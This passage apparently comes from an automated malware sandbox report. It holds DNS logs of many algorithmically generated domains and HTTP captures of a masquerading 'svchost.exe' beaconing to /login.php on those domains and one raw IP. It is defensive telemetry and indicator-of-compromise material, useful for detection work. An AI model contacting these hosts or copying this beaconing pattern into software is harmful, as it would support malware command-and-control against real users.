                                                                                                                                                                                                            Nov 11, 2024 18:08:50.277127981 CET1.1.1.1192.168.2.90xc99eName error (3)pufybyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.277260065 CET1.1.1.1192.168.2.90x1490Name error (3)volyjif.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.277940035 CET1.1.1.1192.168.2.90xec9bName error (3)lygynyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.278079033 CET1.1.1.1192.168.2.90xf19eName error (3)lykymij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.280157089 CET1.1.1.1192.168.2.90x782fName error (3)gadyvez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.282907963 CET1.1.1.1192.168.2.90xc7baName error (3)qetysog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.283725977 CET1.1.1.1192.168.2.90xbb68Name error (3)lyvylyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.283771992 CET1.1.1.1192.168.2.90xa0bdName error (3)lyryson.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.289880037 CET1.1.1.1192.168.2.90x768dName error (3)lysyvax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.292509079 CET1.1.1.1192.168.2.90x1809Name error (3)qedyvap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.294442892 CET1.1.1.1192.168.2.90x4d82Name error (3)vonyryk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.298023939 CET1.1.1.1192.168.2.90x47d5Name error (3)galyhib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.298103094 CET1.1.1.1192.168.2.90x94b4Name error (3)qebylyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.298490047 CET1.1.1.1192.168.2.90x148bName error (3)vonyzut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.298774004 CET1.1.1.1192.168.2.90x4d7bName error (3)vowypim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.299803972 CET1.1.1.1192.168.2.90x9d12Name error (3)gatydab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.304564953 CET1.1.1.1192.168.2.90xd04bName error (3)qeqylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.304991961 CET1.1.1.1192.168.2.90x6096Name error (3)gahynuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.305924892 CET1.1.1.1192.168.2.90x2229Name error (3)pumytyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.306169987 CET1.1.1.1192.168.2.90xbeb5Name error (3)pujymiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.755846977 CET1.1.1.1192.168.2.90x93d4Name error (3)volymuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.760560036 CET1.1.1.1192.168.2.90x4ff3Name error (3)qedysol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.762048006 CET1.1.1.1192.168.2.90x1aa1Name error (3)pumyleg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.763237953 CET1.1.1.1192.168.2.90x4502Name error (3)lysysir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.764117002 CET1.1.1.1192.168.2.90x36eName error (3)galynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.766536951 CET1.1.1.1192.168.2.90xcba9Name error (3)qekynyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.771007061 CET1.1.1.1192.168.2.90x52dcName error (3)vonykam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.784015894 CET1.1.1.1192.168.2.90xe1eName error (3)pupypil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.784612894 CET1.1.1.1192.168.2.90x29a5Name error (3)lyvyjoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.787512064 CET1.1.1.1192.168.2.90x59d0Name error (3)pujybev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.851947069 CET1.1.1.1192.168.2.90x35ddName error (3)ganykah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.854372025 CET1.1.1.1192.168.2.90x2944Name error (3)vopyput.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.855278015 CET1.1.1.1192.168.2.90xc93aName error (3)gatypuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.858458996 CET1.1.1.1192.168.2.90x9728Name error (3)lyryler.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.859947920 CET1.1.1.1192.168.2.90x455cName error (3)pufypuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.864047050 CET1.1.1.1192.168.2.90x17c1Name error (3)qegysiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.864191055 CET1.1.1.1192.168.2.90x8e88Name error (3)lykynyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.865838051 CET1.1.1.1192.168.2.90xad1aName error (3)lymylen.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.871624947 CET1.1.1.1192.168.2.90xec7Name error (3)qexynyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.873116016 CET1.1.1.1192.168.2.90x8fa8Name error (3)vocymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.873419046 CET1.1.1.1192.168.2.90x4999Name error (3)lygysid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.874150038 CET1.1.1.1192.168.2.90xd16eName error (3)vowykat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.874953032 CET1.1.1.1192.168.2.90xe370Name error (3)qetylel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.875430107 CET1.1.1.1192.168.2.90xfc32Name error (3)vojydoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.876161098 CET1.1.1.1192.168.2.90x6383Name error (3)gahydos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.876173019 CET1.1.1.1192.168.2.90x564cName error (3)vojybef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.877188921 CET1.1.1.1192.168.2.90xb082Name error (3)qebykoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.877198935 CET1.1.1.1192.168.2.90xc4f8Name error (3)purylal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.881617069 CET1.1.1.1192.168.2.90x29bcName error (3)lyvymun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.883790970 CET1.1.1.1192.168.2.90xa6e2Name error (3)qebyqig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.886507034 CET1.1.1.1192.168.2.90x9adaName error (3)puvymug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.893651962 CET1.1.1.1192.168.2.90xac64Name error (3)gacynyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.895323038 CET1.1.1.1192.168.2.90xa3baName error (3)pumywov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.914482117 CET1.1.1.1192.168.2.90x222cName error (3)pujydap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.914716005 CET1.1.1.1192.168.2.90x5f08Name error (3)vopyzyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.269279957 CET1.1.1.1192.168.2.90x323bName error (3)qegyvag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.269311905 CET1.1.1.1192.168.2.90x1fa0Name error (3)qexyhul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.269932985 CET1.1.1.1192.168.2.90x354eName error (3)vowyrec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.271780968 CET1.1.1.1192.168.2.90xa0b2Name error (3)galyfez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.271795988 CET1.1.1.1192.168.2.90xd6aaName error (3)gatyzyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.272649050 CET1.1.1.1192.168.2.90xec86Name error (3)gacyhuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.289105892 CET1.1.1.1192.168.2.90x5460Name error (3)qekyfep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.290972948 CET1.1.1.1192.168.2.90x4833Name error (3)lyxygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.292593956 CET1.1.1.1192.168.2.90x635cName error (3)lysyxuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.082118988 CET1.1.1.1192.168.2.90xfc03Name error (3)lymywad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.082134008 CET1.1.1.1192.168.2.90x3ca0Name error (3)qedyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083174944 CET1.1.1.1192.168.2.90xe723Name error (3)ganyqib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083204985 CET1.1.1.1192.168.2.90xf2aName error (3)pufycog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083276033 CET1.1.1.1192.168.2.90xec36Name error (3)lykyfax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083292961 CET1.1.1.1192.168.2.90x979aName error (3)lyrytyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.086327076 CET1.1.1.1192.168.2.90x978fName error (3)purytyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.088217020 CET1.1.1.1192.168.2.90xe8d7Name error (3)vofycim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.088229895 CET1.1.1.1192.168.2.90xe168Name error (3)vonyqof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.089378119 CET1.1.1.1192.168.2.90x90e5Name error (3)volygyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.090313911 CET1.1.1.1192.168.2.90x6145Name error (3)pupyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.102423906 CET1.1.1.1192.168.2.90x1ae1Name error (3)qeqyrav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.104063034 CET1.1.1.1192.168.2.90xec0bName error (3)puzygyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.104610920 CET1.1.1.1192.168.2.90x1fd9Name error (3)gahyvab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.104624987 CET1.1.1.1192.168.2.90x4e12Name error (3)puvyjiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.105623960 CET1.1.1.1192.168.2.90x5e07Name error (3)gadycih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.105634928 CET1.1.1.1192.168.2.90x84ffName error (3)vocyjik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.105901957 CET1.1.1.1192.168.2.90x3987Name error (3)qetytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.111394882 CET1.1.1.1192.168.2.90xfbd7Name error (3)lygyvon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.543850899 CET1.1.1.1192.168.2.90x865dName error (3)puzybeq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.544641972 CET1.1.1.1192.168.2.90x371fName error (3)pupyteg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.544966936 CET1.1.1.1192.168.2.90x37fdName error (3)vofypuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.550282955 CET1.1.1.1192.168.2.90x9f31Name error (3)lyxynej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.550587893 CET1.1.1.1192.168.2.90xcc3dName error (3)ganyhus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.551038027 CET1.1.1.1192.168.2.90xf7cName error (3)qeqykop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.556212902 CET1.1.1.1192.168.2.90x2c65Name error (3)vopyrem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.560209990 CET1.1.1.1192.168.2.90x46b5Name error (3)gadypub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.563343048 CET1.1.1.1192.168.2.90xd091Name error (3)gaqykoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.563457012 CET1.1.1.1192.168.2.90x45b8Name error (3)gatyrah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.564819098 CET1.1.1.1192.168.2.90x5d82Name error (3)pujycil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.566728115 CET1.1.1.1192.168.2.90xeeeeName error (3)vojycit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.578574896 CET1.1.1.1192.168.2.90x83d3Name error (3)qedytyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.586090088 CET1.1.1.1192.168.2.90x2fa4Name error (3)qebyhuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.586101055 CET1.1.1.1192.168.2.90x6342Name error (3)vofyzyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.586112022 CET1.1.1.1192.168.2.90xf361Name error (3)lykyvor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.586122990 CET1.1.1.1192.168.2.90x179eName error (3)pumyjip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.586132050 CET1.1.1.1192.168.2.90x3c3aName error (3)lyvygyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.586215973 CET1.1.1.1192.168.2.90x45d4Name error (3)qekyvol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.586226940 CET1.1.1.1192.168.2.90x31e3Name error (3)puzydog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.586236000 CET1.1.1.1192.168.2.90xe241Name error (3)lymyjix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.586905956 CET1.1.1.1192.168.2.90x4327Name error (3)vonyjuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.587225914 CET1.1.1.1192.168.2.90x22cfName error (3)galyvaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.587932110 CET1.1.1.1192.168.2.90x56c0Name error (3)lyxyfan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.595921993 CET1.1.1.1192.168.2.90x5a28Name error (3)gacyfeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.597853899 CET1.1.1.1192.168.2.90x749cName error (3)gaqyqiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.600317955 CET1.1.1.1192.168.2.90xb8e2Name error (3)lygyxux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.608897924 CET1.1.1.1192.168.2.90x82efName error (3)volybak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.609047890 CET1.1.1.1192.168.2.90xc593Name error (3)lysytyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.620296955 CET1.1.1.1192.168.2.90xafaaName error (3)pufyxyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.789539099 CET1.1.1.1192.168.2.90xecc2Name error (3)qeqyqul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.789577007 CET1.1.1.1192.168.2.90xecbfName error (3)vowyqik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.789695978 CET1.1.1.1192.168.2.90x302cName error (3)qexyfag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.790419102 CET1.1.1.1192.168.2.90x7dd7Name error (3)vocygef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.847249031 CET1.1.1.1192.168.2.90xb786Name error (3)lyrywoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.847332001 CET1.1.1.1192.168.2.90xdab4Name error (3)puvygyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.847418070 CET1.1.1.1192.168.2.90xa3a1Name error (3)qegyxup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.897330999 CET1.1.1.1192.168.2.90x4234Name error (3)qetyraq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.933562994 CET1.1.1.1192.168.2.90x4b58Name error (3)gahycuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.205614090 CET1.1.1.1192.168.2.90x5ac1Name error (3)purywoq.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • www.google.comuser-agent:
                                                                                                                                                                                                              • puzylyp.com
                                                                                                                                                                                                              • qegyhig.com
                                                                                                                                                                                                              • lysyvan.com
                                                                                                                                                                                                              • lymyxid.com
                                                                                                                                                                                                              • gahyqah.com
                                                                                                                                                                                                              • vonypom.com
                                                                                                                                                                                                              • qetyfuv.com
                                                                                                                                                                                                              • vocyzit.com
                                                                                                                                                                                                              • lyvyxor.com
                                                                                                                                                                                                              • galyqaz.com
                                                                                                                                                                                                              • vojyqem.com
                                                                                                                                                                                                              • gatyfus.com
                                                                                                                                                                                                              • gadyniw.com
                                                                                                                                                                                                              • pupydeq.com
                                                                                                                                                                                                              • lygynud.com
                                                                                                                                                                                                              • pupycag.com
                                                                                                                                                                                                              • lyrysor.com
                                                                                                                                                                                                              • 106.15.232.163:8000
                                                                                                                                                                                                              • qexyhuv.com
                                                                                                                                                                                                              • galynuh.com
                                                                                                                                                                                                              • lyxynyx.com
                                                                                                                                                                                                              • gadyciz.com
                                                                                                                                                                                                              • qegyval.com
                                                                                                                                                                                                              • vofycot.com
                                                                                                                                                                                                              • ww16.vofycot.com
                                                                                                                                                                                                              • ww25.lyxynyx.com
                                                                                                                                                                                                              • qetyhyg.com
                                                                                                                                                                                                              • gatyhub.com
                                                                                                                                                                                                              • lygyvuj.com
                                                                                                                                                                                                              • gahyhiz.com

                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.9568603.94.10.34807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.709790945 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lymyxid.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.142407894 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.95686123.253.46.64807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.103235960 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.533425093 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:33 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.533436060 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.956865188.114.96.3807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.110194921 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.812273026 CET964INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
